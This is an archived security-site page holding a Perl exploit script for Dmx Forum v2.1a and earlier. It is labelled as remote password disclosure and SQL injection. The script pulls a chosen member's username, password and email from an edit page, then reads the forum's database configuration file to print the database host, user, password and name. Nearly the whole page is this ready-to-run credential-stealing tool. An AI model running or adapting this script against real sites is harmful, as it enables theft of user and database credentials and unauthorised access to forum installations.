TUCoPS :: Web BBS :: etc :: b06-2733.htm

Dmx Forum <= v2.1a Remote Passwords Disclosure
Dmx Forum <= v2.1a Remote Passwords Disclosure
Dmx Forum <= v2.1a Remote Passwords Disclosure



#!/usr/bin/perl=0D
#=0D
# by DarkFig -- www.acid-root.new.fr=0D 
#=0D
use LWP::Simple;=0D
=0D
if ( !$ARGV[1] ) {=0D
header();=0D
print "\n| Usage:   ----------------|";=0D
print "\n+------------------------------------------+";=0D
print "\n| Example: http://localhost/dmx/ 1 ------|";=0D 
end();=0D
}=0D
=0D
sub header {=0D
print "\n+------------------------------------------+";=0D
print "\n| Dmx Forum <= v2.1a SQL Injection Exploit |";=0D
print "\n+------------------------------------------+";=0D
}=0D
=0D
sub end {=0D
print "\n+------------------------------------------+\n";=0D
exit;=0D
}=0D
=0D
$err0 = "\n[-]Can't connect to the host !";=0D
=0D
header();=0D
$url = "$ARGV[0]"."pops/edit.php?membre="."$ARGV[1]";=0D
$req = get($url) or print "$err0";=0D
=0D
if( $req =~ /input name="pseudo" type="text" id="pseudo" value="(.*?)"/ ){=0D
print "\n [+]Username: $1";=0D
$req =~ /input name="pwd" type="password" id="pwd" value="(.*?)"/ , print "\n [+]Password: $1";=0D
$req =~ /input name="email" type="text" id="email" value="(.*?)"/ , print "\n [+]Email: $1";} else {print "\n[-]Part 1 failed !";}=0D
=0D
=0D
$url2 = "$ARGV[0]"."_includes/bd.inc";=0D
$req2 = get($url2) or print "$err0";=0D
if($req2 =~ /host = "(.*?)";/)=0D
{print "\n[+]DBHOST: $1";=0D
$req2 =~ /user = "(.*?)";/;print "\n[+]DBUSER: $1";=0D
$req2 =~ /pass = "(.*?)";/;print "\n[+]DBPASS: $1";=0D
$req2 =~ /bdd = "(.*?)";/;print "\n[+]DBNAME: $1";=0D
} else {print "\n[-]Part 2 failed !";}=0D
=0D
end();

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH